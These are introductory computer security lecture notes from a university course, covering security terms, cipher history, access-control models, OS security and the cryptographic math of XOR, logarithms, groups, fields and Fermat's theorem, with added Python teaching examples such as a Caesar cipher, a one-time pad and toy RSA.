Introduction to Computer Security CS3235 (cs3235/2003-semesterI/foils.pdf)
Introduction to Computer Security CS3235
Hugh Anderson
CS3235 - Hugh Anderson’s notes.
Contact information
Room S15 #06-12
Telephone 6874-6903
E-mail [email protected]
...and Spinellis...
People
Dr Robert Deng, Institute for Infocomm Research
http://www.i2r.a-star.edu.sg/icsd/staff/Robert/
Official SOC description
With the widespread use of computers and Internet as well as electronic commerce, computer security becomes more and more important. The objective of this module is to give students basic knowledge of computer security. This module covers the following topics: threats to computer systems, network security fundamentals, security in a layered protocol architecture, authentication in computer systems, access control, intrusion detection, security architecture and frameworks, lower layers security protocols, upper layer security protocols, electronic mail and EDI security, directory systems security, Unix systems security, security evaluation criteria.
Assessment
| Assessment | Weighting | Grade |
|---|---|---|
| Assignments | 35% | |
| Tutorials | 5% | |
| Mid-term (closed book) | 10% | |
| Final exam (open book) | 50% | |
| Total marks | 100% | |
Resources
Computer Security: Art and Science, Matt Bishop
The notes are expanded versions of the overheads
Directed readings - all available on the Internet.
IVLE at http://ivle.nus.edu.sg/
Web site at http://www.comp.nus.edu.sg/~cs3235
Comparison
Different focus
More introductory and practical material
Less material duplicated
Topics - general
History and background,
Preliminaries
Encoding and decoding
Protocols used for security.
Topics - detail
• Mathematical, physical, legal (2 lectures)
• Security models (1 lecture)
• Secrecy (1 lecture)
• Insecurity (2 lectures)
• Safety/control hardware/software (2 lectures)
• Assurance (1 lecture)
• Protocols (1 lecture)
• + Case studies
Tutorials
Start in 3rd week
More details next week
My expectation...
Attend classes and tutorials
Ask if you don’t know
Read notes, book, and the readings...
Get interested in the subject
Chapter 1
Lecture 1 - Introduction
Jump-about-introduction
...sorry sorry...
The History of Herodotus
For Histiæus, when he was anxious to give Aristagoras orders to revolt, could find but one safe way, as the roads were guarded, of making his wishes known; which was by taking the trustiest of his slaves, shaving all the hair from off his head, and then pricking letters upon the skin, and waiting till the hair grew again. Thus accordingly he did; and as soon as ever the hair was grown, he despatched the man to Miletus, giving him no other message than this- "When thou art come to Miletus, bid Aristagoras shave thy head, and look thereon." Now the marks on the head, as I have already mentioned, were a command to revolt...
The History of Herodotus
Histiæus ensured confidentiality
Used again by Germany in the 1914-1918 war
This is now called steganography
More history
Cæsar encoded messages - cryptography
Agreed protocols to ensure correct conduct of a war
Examples taken from the world of warfare
Aspects to “computer security”
Security problems in society reoccur in computers
Confidentiality = locks/encoding.
Integrity = handshakes/signatures
Computer versions much faster.
In this course, security includes wider aspects.
Terms: Services
Three aspects of security services:
• confidentiality : concealing information - resources;
• integrity : trustworthiness of data - resources;
• availability : preventing denial-of-service.
Terms: Threats
(Figures: Alice and Bob communicating while Ted interferes, illustrating in turn snooping, man in the middle, denial of service, and spoofing.)
Terms: Threats
• disclosure : unauthorized access (snooping);
• deception : accept false data (man-in-the-middle);
• disruption : prevent correct operation (denial-of-service);
• usurpation : unauthorized control (spoofing).
Terms: Policy and mechanism
We differentiate between a security policy and a security mechanism:
• policy : what is allowed/disallowed;
• mechanism : ways of enforcing a policy
NUS IT policy
For example, at NUS, we have an IT policy which includes a range of clauses regarding security concerns, such as:
4.2 Undermining System Integrity
Users must not undermine the security of the IT Resources, for example, by cracking passwords or to modify or attempt to modify the files of other Users or software components of the IT Resources.
NUS mechanisms
6.3 Use Of Security Scanning Systems
Users consent to the University’s use of scanning programs for security purposes at system level for computers and systems that are connected to the University’s network. This is to ensure that any computers or systems attached to the network will not become a launching pad for security attack and jeopardise the IT Resources. System level scanning includes scanning for security vulnerabilities and virus detection on email attachments. Users’ files and data are excluded from the scanning.
Topic: Preliminaries
Review some mathematical concepts: XOR, modulo, primes.
The textbook, and my notes should be enough.
Physical laws and procedures. Information and Entropy
Topic: Security models
These models provide formal ways of looking at computer security in an abstract manner.
1. Define a model, and
2. prove it secure
3. Ensure system complies with model
Topic: Security models
• The Bell-LaPadula model (no read-up, no write-down) provides a military viewpoint to assure confidentiality services.
• The Biba and Clark-Wilson models attempt to model the trustworthiness of data and programs, providing assurance for integrity services.
... Read ahead ...
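The two Bell-LaPadula rules named above, worked through in code. This is an added example, not part of the lecture notes: labels combine a classification level with a set of need-to-know categories (so some labels are incomparable and the label set is a lattice, not a chain), and the level names, category names, subjects and objects are all constructed for illustration.

```python
# Added example, not from the lecture notes: the two Bell-LaPadula rules
# (simple security property = no read-up, *-property = no write-down)
# on labels made of a classification level plus a set of categories.
# Level names, category names, subjects and objects below are constructed.
from dataclasses import dataclass

LEVELS = {"unclassified": 0, "confidential": 1, "secret": 2, "top-secret": 3}


@dataclass(frozen=True)
class Label:
    """Security label: a linear level plus an unordered need-to-know set."""
    level: str
    categories: frozenset = frozenset()


def dominates(a: Label, b: Label) -> bool:
    """a dominates b when its level is at least b's and it holds every
    category b holds.  Labels with disjoint categories are incomparable,
    which is what makes the label set a lattice rather than a chain."""
    return LEVELS[a.level] >= LEVELS[b.level] and a.categories >= b.categories


def may_read(subject: Label, obj: Label) -> bool:
    """Simple security property: a subject may read only objects it dominates."""
    return dominates(subject, obj)


def may_write(subject: Label, obj: Label) -> bool:
    """*-property: a subject may write only to objects that dominate it,
    so information can never flow to a lower or incomparable label."""
    return dominates(obj, subject)


def decide(subject: Label, obj: Label, mode: str) -> bool:
    """Reference-monitor style check for a single access request."""
    if mode == "read":
        return may_read(subject, obj)
    if mode == "write":
        return may_write(subject, obj)
    raise ValueError(f"unknown access mode {mode!r}")


def audit(requests):
    """Evaluate constructed (subject, object, mode) requests and return
    the list of (subject, object, mode, allowed) decisions."""
    return [(s, o, m, decide(s, o, m)) for s, o, m in requests]


if __name__ == "__main__":
    analyst = Label("secret", frozenset({"nuclear"}))
    memo = Label("confidential")
    plan = Label("top-secret", frozenset({"nuclear"}))
    for s, o, m, ok in audit([(analyst, memo, "read"),
                              (analyst, memo, "write"),
                              (analyst, plan, "read"),
                              (analyst, plan, "write")]):
        print(f"{s.level:<12} {m:<5} {o.level:<12} -> {'allow' if ok else 'deny'}")
```

The interesting case is the write rule: the secret analyst may read the confidential memo but may not write to it, because a read followed by a write-down would move secret content to a confidential object. The same check denies a secret subject without the "nuclear" category from reading a secret/nuclear object, even though the levels are equal.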
Topic: Security models
Determine properties of the model, and
Verify that implementations are valid.
Basis of trusted operating systems
Modelling for availability is tricky
Topic: Secrecy
Commerce relies on secure transfer of information, and
Often just want things to be secret
Distance between you and an attacker is shrinking
Criminals have an access point into your living room
2000 years ago...
Replace each Roman letter in a message with another Roman letter, obtained by rotating the alphabet some number of characters:

```
Plaintext:   I C L A V D I V S
             A B C D E F G H I K L M N O P Q R S T V X Y Z
             V X Y Z A B C D E F G H I K L M N O P Q R S T
Ciphertext:  E Y G V Q Z E Q O
```

We can specify a Cæsar cipher by just noting the number of characters that the alphabet is rotated.
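The rotation described above, as an added example that is not part of the lecture notes. It uses the 23-letter Roman alphabet exactly as printed on the slide (no J, U or W), recovers the key from the table's A-to-V row, encrypts ICLAVDIVS, and goes one step beyond the slide by trying every possible key, which is the standard demonstration of why a 23-key cipher gives no real secrecy.

```python
# Added example, not from the lecture notes: a Caesar cipher over the
# 23-letter Roman alphabet shown on the slide (no J, U or W), plus the
# 23-key exhaustive search that shows why rotation alone gives no secrecy.
LATIN = "ABCDEFGHIKLMNOPQRSTVXYZ"   # alphabet exactly as on the slide
ALPHA_LEN = len(LATIN)              # 23


def caesar(text: str, shift: int) -> str:
    """Rotate each letter of `text` by `shift` places within LATIN.
    A negative shift decrypts.  Characters outside the alphabet (spaces,
    punctuation) are passed through unchanged."""
    out = []
    for ch in text.upper():
        idx = LATIN.find(ch)
        out.append(ch if idx < 0 else LATIN[(idx + shift) % ALPHA_LEN])
    return "".join(out)


def shift_from_table(plain_letter: str, cipher_letter: str) -> int:
    """Recover the key from one column of the slide's substitution table:
    the slide maps A -> V, which is a rotation of 19 (equivalently -4)."""
    return (LATIN.index(cipher_letter) - LATIN.index(plain_letter)) % ALPHA_LEN


def brute_force(ciphertext: str) -> dict:
    """Try every key.  There are only ALPHA_LEN candidates, so whoever
    holds the ciphertext just reads off the one that looks like Latin."""
    return {k: caesar(ciphertext, -k) for k in range(ALPHA_LEN)}


if __name__ == "__main__":
    key = shift_from_table("A", "V")
    ct = caesar("ICLAVDIVS", key)
    print(key, ct, caesar(ct, -key))
    for k, candidate in brute_force(ct).items():
        print(f"key {k:2d}: {candidate}")
```

The key space is the whole security of the scheme: once the alphabet is known, the 23 candidates from `brute_force` are all there is to check, which is the point the slide makes by describing the cipher with a single number.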
60 years ago...
Enigma machines
Commercial device
Used by the German military
Belief that could not be decoded.
Hacking Enigma
Americans captured a German submarine?
Alan Turing did it all?
Hard workers at Bletchley Park?
My dad?
Hacking Enigma
1928: Poles intercepted a machine
1928: Maths Dept at University of Poznan: Marian Rejewski, Jerzy Rozycki, Henryk Zygalski.
Decoded some messages
German army using an extra level of encoding
French spies uncovered the extra encoding
Hacking Enigma
1933-1939: the Polish Ciphers Office was able to decode messages, although slowly.
July 1939: Poland gave Enigma copies to English
Bletchley Park
May 1941: English captured the U-110 submarine, complete with a genuine Enigma machine, and code books.
Hacking Enigma
1941-45: English could decode most German military transmissions.
1941-45: developed a hardware system
Precursor to modern-day computers
Today...sssshhhh
Secure encrypted communications between
two untrusted hosts over an insecure network.
Other connections can also be forwarded
Users must prove their identity to the remote machine
Secure-shell
Based on public-key cryptography:
• Encryption and decryption use separate keys; it is not possible to derive one from the other. RSA is one such system.
• Encodings believed to be difficult to decode, and
• protocols of message exchange that are believed to be secure.
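The separate-key property the slide attributes to RSA, worked through with textbook RSA on tiny primes. This is an added example, not code from the lecture notes: the primes 61 and 53, the exponent 17 and the message 65 are constructed teaching values, and the trial-division step at the end shows the flip side of "not possible to derive one from the other": it holds only because factoring a real-sized modulus is infeasible. Real RSA also pads messages (for example with OAEP) and signs a hash rather than the message itself.

```python
# Added example, not from the lecture notes: textbook RSA with tiny primes,
# to show the separate public/private keys the slide mentions, and a
# trial-division factoring step that shows why real keys must be large.
# The primes and message below are constructed; real RSA adds padding
# (e.g. OAEP) and uses moduli of thousands of bits.
from math import gcd, isqrt


def keygen(p: int, q: int, e: int = 17):
    """Build (public, private) keys from two primes p, q and exponent e."""
    n = p * q
    phi = (p - 1) * (q - 1)           # Euler's totient of n
    if gcd(e, phi) != 1:
        raise ValueError("e must be coprime to phi(n)")
    d = pow(e, -1, phi)               # modular inverse: e*d = 1 (mod phi)
    return (n, e), (n, d)


def encrypt(public, m: int) -> int:
    """Public-key operation: anyone holding (n, e) can do this."""
    n, e = public
    if not 0 <= m < n:
        raise ValueError("message must be an integer in [0, n)")
    return pow(m, e, n)


def decrypt(private, c: int) -> int:
    """Private-key operation: only the holder of d can undo encrypt()."""
    n, d = private
    return pow(c, d, n)


def sign(private, m: int) -> int:
    """Signing is the private-key operation applied to (a hash of) m."""
    n, d = private
    return pow(m, d, n)


def verify(public, m: int, s: int) -> bool:
    """Anyone can check a signature with the public key."""
    n, e = public
    return pow(s, e, n) == m % n


def factor_by_trial(n: int):
    """Smallest-factor search: instant for a toy n, hopeless for real
    2048-bit moduli.  Knowing p and q is exactly what yields d."""
    for p in range(2, isqrt(n) + 1):
        if n % p == 0:
            return p, n // p
    return None


def recover_private_exponent(public):
    """Derive d from the public key alone by factoring n; this is the
    step that key size is chosen to make infeasible."""
    n, e = public
    p, q = factor_by_trial(n)
    return pow(e, -1, (p - 1) * (q - 1))


if __name__ == "__main__":
    pub, priv = keygen(61, 53)         # n = 3233, a classic teaching example
    c = encrypt(pub, 65)
    print(pub, priv, c, decrypt(priv, c))
    s = sign(priv, 65)
    print(verify(pub, 65, s), verify(pub, 66, s))
    print(recover_private_exponent(pub) == priv[1])
```

With p = 61 and q = 53 the keys come out as (3233, 17) and (3233, 2753), and the message 65 encrypts to 2790. The same modulus is factored by `factor_by_trial` in a few dozen divisions, which is why the "not possible to derive one from the other" claim is a statement about key length, not about the algebra.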
Topic: Insecurity
Systems dangerously easy to subvert
Adversary gains control over your system
You sign a contract, and other party doesn’t.
Investigate hacking and reducing risk
Topic: Insecurity
A locked air-conditioned room with file server:
• The lock can be picked, or the door kicked in.
• The console of the server computer may be password protected, but
– it may be rebooted with a different disk.
Topic: Insecurity
• The reboot process may be (BIOS) password protected, but
– the case of the computer may be opened and the disk removed.
• And so on...
Topic: Insecurity
Tempest - computer screen monitoring
Paper
http://jya.com/emr.pdf
Overcoming
http://www.cs.rice.edu/~dwallach/courses/comp527 s2000/ih98-tempest.pdf
Monitor screens at a distance of 1km for $15.
Topic: Insecurity
Kick in doors without even using your feet
Topic: Insecurity
Non-repudiation for e-commerce:
• the buyer cannot order an item and then deny the order took place;
• the seller cannot accept money or an order and then later deny that this took place.
Topic: Insecurity
Intrusive hacking is common on the Internet.
Farms of subservient machines:
At first, it looked as if some students at the Flint Hill School, a prep academy in Oakton, Va., had found a lucrative alternative to an after-school job...
Topic: Insecurity
Viruses: boot-sector viruses hide their code in the boot sector of a disk.
The Stoned virus for DOS, written by a student from New Zealand!
A virus contains code that replicates, attaching itself to a program, boot sector or document. Some viruses do damage as well.
Topic: Insecurity
A worm is a program that makes copies of itself, transferring itself around. The Morris worm in 1988:
On the evening of 2 November 1988, someone infected the Internet with a worm program. That program exploited flaws in utility programs in systems based on BSD-derived versions of UNIX. The flaws allowed the program to break into those machines and copy itself, thus infecting those systems.
The Morris Worm
This program eventually spread to thousands of machines, and disrupted normal activities and Internet connectivity for many days.
ftp://ftp.cs.purdue.edu/pub/reports/TR823.PS.Z
The author of the worm, Robert Morris, was convicted and fined $10,050 in 1990, and is currently a professor in the Parallel and Distributed Operating Systems group at MIT, lecturing in distributed systems areas.
Topic: Protocols
Some aspects of security are determined by the way in which we do things (the protocol), rather than what is actually done.
Summary of topics
In this section, we introduced the following topics:
• An introduction to computer security
• Some definitions
Further study
• Textbook Chapter 1
• Monitoring computer screens: http://jya.com/emr.pdf
• Overcoming Tempest monitoring: http://www.cs.rice.edu/~dwallach/courses/comp527 s2000/ih98-tempest.pdf
• The Morris worm: ftp://ftp.cs.purdue.edu/pub/reports/TR823.PS.Z
• Military mathematical modelling of security: http://80-ieeexplore.ieee.org.libproxy1.nus.edu.sg/xpl/tocresult.jsp?isNumber=13172
Done!
Chapter 2
Lecture 2 - Preliminaries
Note: CORS
You should be getting your tutorial sessions sorted out using CORS!
http://www.cors.nus.edu.sg/
Overheads and notes
You can find all sorts of stuff looking in
http://www.comp.nus.edu.sg/~cs3235/2003-semesterI/
Question box
If you have any questions, feel free to place them in the question box...
Or stick your hand up...
Or...
Last session
Introduction, setting context
Definitions
Cæsar cipher, Enigma, Secure shell
Insecurity
This session
• Finish context
• Math preliminaries
– XOR
– Logarithms
– Fields and groups
Diagram for BAG
Safety/control software
A naive approach to security might involve attempting to ensure that all programs that run on a computer are safe, and that all users of computer systems are trustworthy.
Checking even one program is a non-trivial task.
The computer operating system normally provides some level of software and hardware security for computer systems, combined with some level of user authorization.
Safety/control software
User authorization means passwords!
Systems have grown in complexity over the years.
An article shows the changes in the UNIX mechanism
Hardware security
Hardware security in operating systems has been studied in CS2106 (Operating Systems) and other courses. The Kernel/Supervisor bit, processor ring0, memory protection/mapping hardware and so on are all examples of hardware security systems intended to co-operate with the OS to enhance system security.
Software security in operating systems takes many forms. The forms range from ad-hoc changes to operating systems to fix security loopholes as they are found, through to operating systems built from the ground up to be secure.
Example: network security
TCP wrappers:
• Attacks come through poorly controlled TCP or UDP ports.
• The wrapper provides a single point of control.
• The default installation disables all access.
• Access is re-enabled on a case-by-case basis.
OS security
NSA have a security-enhanced Linux system:
This version of Linux has a strong, flexible mandatory access control architecture incorporated into the major subsystems of the kernel. The system provides a mechanism to enforce the separation of information based on confidentiality and integrity requirements.
You can read about SELinux at
http://www.nsa.gov/selinux/index.html
OS security
Java virtual machine has built-in security model
Microsoft point out that the Linux security model is weak...
Every member of the Windows NT family since Windows NT 3.5 has been evaluated at either a C2 level under the U.S. Government’s evaluation process or at a C2-equivalent level under the British Government’s ITSEC process. In contrast, no Linux products are listed on the U.S. Government’s evaluated product list.
Topic: Assurance
How can we convince ourselves (or our employer) that the computer system is to be trusted?
Building assurance is best done by adopting formal methods to confirm, specify and verify the behaviour of systems.
ITSEC and CC
UK, Germany, France, Netherlands produced the Information Technology Security Evaluation Criteria (ITSEC).
The IT Security Evaluation Manual (ITSEM) specifies the methodology for evaluation.
The Common Criteria for Information Technology Security Evaluation draws together ITSEC, CTCPEC (Canadian Criteria) and the US Federal Criteria.
Accepted by the ISO (ISO15408).
ITSEC
In an article, elements of the first certification of a smart-card system under the European ITSEC level 6 certification are outlined.
This process involved verification of the specification with independent systems, and a formal process for the implementation, deriving it from the specification using the refinement process.
Math preliminaries
This chapter and the following chapter are copied verbatim from “The Laws of Cryptography with Java Code”, with permission from Prof Neal Wagner. The book is well worth reading and contains a lot of information that is relevant to this course. You can find the book at
http://www.cs.utsa.edu/~wagner/lawsbookcolor/laws.pdf
Exclusive-Or
Law XOR-1: The cryptographer’s favorite function is Exclusive-Or.
Exclusive-Or comes up constantly in cryptography.
It is the same as addition mod 2.
Exclusive-Or
Also written as xor, or as a plus sign in a circle, ⊕.
The expression a ⊕ b means either a or b but not both.
Ordinary inclusive-or in mathematics means either one or the other or both.
The exclusive-or function in C / C++ / Java for bit strings is written as a hat character: ^ .
Exclusive-Or for 1-bit
a  b  a ⊕ b
0  0    0
0  1    1
1  0    1
1  1    0
Exclusive-Or
Message          A         B         C
m                01000001  01000010  01000011  . . .
Key = k          00010011  01100101  00111001  . . .
K(m) = m ⊕ k     01010010  00100111  01111010  . . .
K(m)             R         '         z
Exclusive-Or
K(m)             R         '         z
                 01010010  00100111  01111010  . . .
Key = k          00010011  01100101  00111001  . . .
m = K(m) ⊕ k     01000001  01000010  01000011  . . .
Message          A         B         C
If the bit-stream is random, and not known to an eavesdropper, then this is the most secure system. It is known as a one-time-pad.
Properties of XOR
a ⊕ a = 0
a ⊕ 0 = a
a ⊕ 1 = ∼a, where ∼ is bit complement.
a ⊕ b = b ⊕ a (commutativity)
a ⊕ (b ⊕ c) = (a ⊕ b) ⊕ c (associativity)
a ⊕ a ⊕ a = a
if a ⊕ b = c, then c ⊕ b = a and c ⊕ a = b.
Reminder
Exchange the values in two variables a and b
temp = a;
a = b;
b = temp;
Exchange using XOR
a = a xor b;
b = a xor b;
a = a xor b;
a′ = a ⊕ b
b′ = (a ⊕ b) ⊕ b = a
a′′ = (a ⊕ b) ⊕ a = b
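The one-time pad from the Exclusive-Or slides and the XOR exchange above, written out as a runnable Python example (added here; it is not code from the slides or from Wagner's book). The message "ABC" and the 24-bit key are the values shown on the slides; the function names are my own.

```python
def xor_bytes(a: bytes, b: bytes) -> bytes:
    """a ⊕ b, bit by bit, for two byte strings of the same length."""
    if len(a) != len(b):
        raise ValueError("a one-time pad key must be exactly as long as the message")
    return bytes(x ^ y for x, y in zip(a, b))

def bit_rows(data: bytes) -> str:
    """Render bytes as the 8-bit groups shown on the slides."""
    return " ".join(f"{byte:08b}" for byte in data)

# Constructed to match the slides: the message "ABC" and the 24-bit key k.
MESSAGE = b"ABC"                                   # 01000001 01000010 01000011
KEY = bytes([0b00010011, 0b01100101, 0b00111001])  # 00010011 01100101 00111001

def encrypt(m: bytes, k: bytes) -> bytes:
    """K(m) = m ⊕ k."""
    return xor_bytes(m, k)

def decrypt(c: bytes, k: bytes) -> bytes:
    """m = K(m) ⊕ k; this works because (m ⊕ k) ⊕ k = m ⊕ (k ⊕ k) = m ⊕ 0 = m."""
    return xor_bytes(c, k)

def xor_swap(a: int, b: int) -> tuple:
    """Exchange two values with no temporary, as on the 'Exchange using XOR' slide.
    (On real memory this only works when a and b are distinct locations:
    if both names alias the same cell, the first step zeroes it.)"""
    a = a ^ b   # a'  = a ⊕ b
    b = a ^ b   # b'  = (a ⊕ b) ⊕ b = a
    a = a ^ b   # a'' = (a ⊕ b) ⊕ a = b
    return a, b

def pad_reuse_leak(c1: bytes, c2: bytes) -> bytes:
    """Why the pad is 'one-time': for two ciphertexts under the same key,
    c1 ⊕ c2 = (m1 ⊕ k) ⊕ (m2 ⊕ k) = m1 ⊕ m2, so the key cancels out and the
    relation between the two messages is exposed. Each key is used exactly once."""
    return xor_bytes(c1, c2)

if __name__ == "__main__":
    c = encrypt(MESSAGE, KEY)
    print("m        ", bit_rows(MESSAGE), MESSAGE)
    print("k        ", bit_rows(KEY))
    print("K(m)     ", bit_rows(c), c)
    print("K(m) ⊕ k ", bit_rows(decrypt(c, KEY)), decrypt(c, KEY))
    print("swap     ", xor_swap(5, 9))
```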
Logarithms
Law LOG-1: The cryptographer’s favorite logarithm is log base 2.
$y = \log_b x$ is the same as $b^y = x$
$b^{(\log_b x)} = x$
Logarithm is the inverse of exponential.
Logarithms
Use logs base 2 in cryptography.
$y = \log_2 x$ is the same as $2^y = x$
$2^{10} = 1024$ is the same as $\log_2 1024 = 10$.
$2^y > 0$ for all $y$, and
$\log_2 x$ is not defined for $x \le 0$.
Properties of logs
$\log_2(ab) = \log_2 a + \log_2 b$, for all $a, b > 0$
$\log_2(a/b) = \log_2 a - \log_2 b$, for all $a, b > 0$
$\log_2(1/a) = \log_2(a^{-1}) = -\log_2 a$, for all $a > 0$
$\log_2(a^r) = r \log_2 a$, for all $a > 0$, $r$
$\log_2(a + b) =$ (Oops! No simple formula for this.)
Examples
Logarithms base 2
$x = 2^y = 2^{\log_2 x}$      $y = \log_2 x$
1,073,741,824                 30
1,048,576                     20
1,024                         10
8                             3
4                             2
2                             1
1                             0
Examples
Logarithms base 2
$x = 2^y = 2^{\log_2 x}$      $y = \log_2 x$
1                             0
1/2                           −1
1/4                           −2
1/8                           −3
1/1,024                       −10
0                             −∞
< 0                           undefined
Natural logs
A log base 2 is just a fixed constant times a natural log:
$\log_2 x = \log_e x / \log_e 2$, (mathematics)
= Math.log(x)/Math.log(2.0); (Java).
The magic constant is:
$\log_e 2 = 0.69314\,71805\,59945\,30941\,72321$, or $1/\log_e 2 = 1.44269\,50408\,88963\,40735\,99246$.
Proof of formula
$2^y = x$, or $y = \log_2 x$ (then take $\log_e$ of each side)
$\log_e(2^y) = \log_e x$ (then use properties of logarithms)
$y \log_e 2 = \log_e x$ (then solve for $y$)
$y = \log_e x / \log_e 2$ (then substitute $\log_2 x$ for $y$)
$\log_2 x = \log_e x / \log_e 2$.
Bits to represent
Law LOG-2: The log base 2 of an integer x tells how many bits it takes to represent x in binary.
Thus $\log_2 10000 = 13.28771238$, so it takes 14 bits to represent 10000 in binary. (In fact, $10000_{10} = 10011100010000_2$.) Exact powers of 2 are a special case: $\log_2 1024 = 10$, but it takes 11 bits to represent 1024 in binary, as $10000000000_2$.
Similarly, $\log_{10}(x)$ gives the number of decimal digits needed to represent x.
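An added Python example (not from the slides or from Wagner's book) putting Law LOG-2 and the $\log_e x / \log_e 2$ formula into code; the function names are my own. It goes one step beyond the slide: for integers too large for a double to hold exactly, the floating-point count can be off by one, so for key-sized numbers the bit length is counted on the integer itself.

```python
import math

def log2_via_natural(x: float) -> float:
    """log2 x = ln x / ln 2, the formula from the 'Natural logs' slide
    (the Python counterpart of Java's Math.log(x)/Math.log(2.0))."""
    if x <= 0:
        raise ValueError("log2 x is not defined for x <= 0")
    return math.log(x) / math.log(2.0)

def bits_to_represent(x: int) -> int:
    """Law LOG-2 with floating point: floor(log2 x) + 1 binary digits.
    The +1 after the floor is what makes exact powers of two come out right
    (log2 1024 = 10, but 1024 needs 11 bits)."""
    if x <= 0:
        raise ValueError("only positive integers have a binary length")
    return math.floor(math.log2(x)) + 1

def decimal_digits(x: int) -> int:
    """The same rule in base 10: floor(log10 x) + 1 decimal digits."""
    if x <= 0:
        raise ValueError("only positive integers have a decimal length")
    return math.floor(math.log10(x)) + 1

def bits_to_represent_exact(x: int) -> int:
    """Integer-only count of binary digits; never rounds, however large x is."""
    if x <= 0:
        raise ValueError("only positive integers have a binary length")
    return x.bit_length()

def float_method_agrees(x: int) -> bool:
    """True when the floating-point count matches the exact count for x."""
    return bits_to_represent(x) == bits_to_represent_exact(x)

def first_float_failure(max_bits: int):
    """Smallest k such that the all-ones integer 2**k - 1 (exactly k bits) is
    miscounted by the floating-point method, or None if none up to max_bits.
    A double carries 53 significant bits, so once k is large enough the
    conversion to float (or log2 itself) rounds up to 2**k and the count
    becomes k + 1 instead of k."""
    for k in range(1, max_bits + 1):
        if not float_method_agrees((1 << k) - 1):
            return k
    return None

if __name__ == "__main__":
    for x in (10000, 1024, 1, 1073741824):
        print(x, "needs", bits_to_represent(x), "bits; binary", bin(x)[2:],
              "has", bits_to_represent_exact(x))
    print("float method first fails at k =", first_float_failure(64))
```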
Groups
A group is
a set of group elements with a binary operation f
If one denotes the group operation by #, then the above says that for any group elements a and b, a#b is defined and is also a group element.
Groups
Groups:
• are associative, meaning that a#(b#c) = (a#b)#c
• have an identity element e satisfying a#e = e#a = a for any group element a.
• have an inverse a′ for any element a, satisfying a#a′ = a′#a = e.
Groups
If a#b = b#a for all group elements a and b, the group is commutative.
Otherwise it is non-commutative. Notice that even in a non-commutative group, a#b = b#a might sometimes be true — for example if a or b is the identity.
A group with only finitely many elements is called finite; otherwise it is infinite.
Examples
• The integers (all whole numbers, including 0 and negative numbers) form a group using addition. The identity is 0 and the inverse of a is −a.
– This is an infinite commutative group.
• The positive rationals (all positive fractions, including all positive integers) form a group if ordinary multiplication is the operation. The identity is 1 and the inverse of r is $1/r = r^{-1}$.
– This is another infinite commutative group.
Examples
• The integers mod n form a group for any integer n > 0. This group is often denoted $Z_n$. Here the elements are 0, 1, 2, . . ., n − 1 and the operation is addition followed by remainder on division by n. The identity is 0 and the inverse of a is n − a (except for 0 which is its own inverse).
– This is a finite commutative group.
Non-commutative Group
Consider 2-by-2 non-singular matrices of real numbers (or rationals), where the operation is matrix multiplication: $\begin{pmatrix} a & b \\ c & d \end{pmatrix}$. Here a, b, c, and d are real numbers (or rationals) and $ad - bc$ must be non-zero. The inverse is
$\frac{1}{ad - bc} \begin{pmatrix} d & -b \\ -c & a \end{pmatrix}$
and the identity is $\begin{pmatrix} 1 & 0 \\ 0 & 1 \end{pmatrix}$. This is an infinite non-commutative group.
Groups
Law GROUP-1: The cryptographer’s favorite group is the integers mod n, $Z_n$.
In the special case of n = 10, the operation of addition in $Z_{10}$ can be defined by (x + y) mod 10, that is, divide by 10 and take the remainder.
Integers modulo 10
+  0 1 2 3 4 5 6 7 8 9
0  0 1 2 3 4 5 6 7 8 9
1  1 2 3 4 5 6 7 8 9 0
2  2 3 4 5 6 7 8 9 0 1
3  3 4 5 6 7 8 9 0 1 2
4  4 5 6 7 8 9 0 1 2 3
5  5 6 7 8 9 0 1 2 3 4
6  6 7 8 9 0 1 2 3 4 5
7  7 8 9 0 1 2 3 4 5 6
8  8 9 0 1 2 3 4 5 6 7
9  9 0 1 2 3 4 5 6 7 8
Fields
A field has two operations
+, with elements of the field forming a commutative group. Identity is 0 and inverse of a is −a.
∗, with elements of the field except 0 forming another commutative group, identity denoted by 1 and inverse of a denoted by $a^{-1}$.
Fields
There is also the distributive identity, linking + and ∗ :
a ∗ (b + c) = (a ∗ b) + (a ∗ c)
Exclude divisors of zero, that is, non-zero elements whose product is zero.
Equivalent to the following cancellation property: if c is not zero and a ∗ c = b ∗ c, then a = b.
Examples
The rational numbers (fractions) Q, or the real numbers R, or the complex numbers C, using ordinary addition and multiplication (extended in the last case to the complex numbers).
These are all infinite fields.
Example: integers mod p
The integers mod p, denoted $Z_p$, where p is a prime number (2, 3, 5, 7, 11, 13, 17, 19, 23, 29, . . . ).
A group using +. Elements without 0 form a group under ∗. The identity is clearly 1, but the inverse of a non-zero element a is not obvious.
Integers mod p inverse
In Java, the inverse must be x satisfying (x ∗ a) % p == 1.
Find x using the extended Euclidean algorithm:
Since p is prime and a is non-zero, the greatest common divisor of p and a is 1.
The extended Euclidean algorithm gives x and y satisfying x ∗ a + y ∗ p = 1, or x ∗ a = 1 − y ∗ p,
and so x is the inverse of a (mod p).
Field
Law FIELD-1: The cryptographer’s favorite field is the integers mod p, denoted $Z_p$, where p is a prime number.
The above field is the only one with p elements. In other words, the field is unique up to renaming its elements, meaning that one can always use a different set of symbols to represent the elements of the field, but it will still be essentially the same.
Another Field
Law FIELD-2: The cryptographer’s other favorite field is $GF(2^n)$.
There is a finite field with $p^n$ elements (p prime) for any integer n > 1, denoted $GF(p^n)$.
Useful in cryptography with p = 2, that is, with $2^n$ elements for n > 1.
The case $2^8 = 256$ is used, for example, in the new U.S. Advanced Encryption Standard (AES).
Fermat’s Theorem
Law FERMAT-1: The cryptographer’s favorite theorem is Fermat’s Theorem.
In cryptography, one often wants to raise a number to a power, modulo another number.
For the integers mod p where p is a prime (denoted $Z_p$), there is a result known as Fermat’s Theorem, discovered by the 17th century French mathematician Pierre de Fermat, 1601-1665.
Fermat’s theorem
Theorem (Fermat): If p is a prime and a is any non-zero number less than p, then
$a^{p-1} \bmod p = 1$
Fermat’s theorem
 p   a   a^1  a^2  a^3  a^4  a^5  a^6  a^7  a^8  a^9  a^10 a^11 a^12
13   2    2    4    8    3    6   12   11    9    5   10    7    1
13   3    3    9    1    3    9    1    3    9    1    3    9    1
13   4    4    3   12    9   10    1    4    3   12    9   10    1
13   5    5   12    8    1    5   12    8    1    5   12    8    1
13   6    6   10    8    9    2   12    7    3    5    4   11    1
13   7    7   10    5    9   11   12    6    3    8    4    2    1
13   8    8   12    5    1    8   12    5    1    8   12    5    1
13   9    9    3    1    9    3    1    9    3    1    9    3    1
13  10   10    9   12    3    4    1   10    9   12    3    4    1
13  11   11    4    5    3    7   12    2    9    8   10    6    1
13  12   12    1   12    1   12    1   12    1   12    1   12    1
Fermat’s theorem
For p = 13 the value is always 1 by the time the power gets to 12.
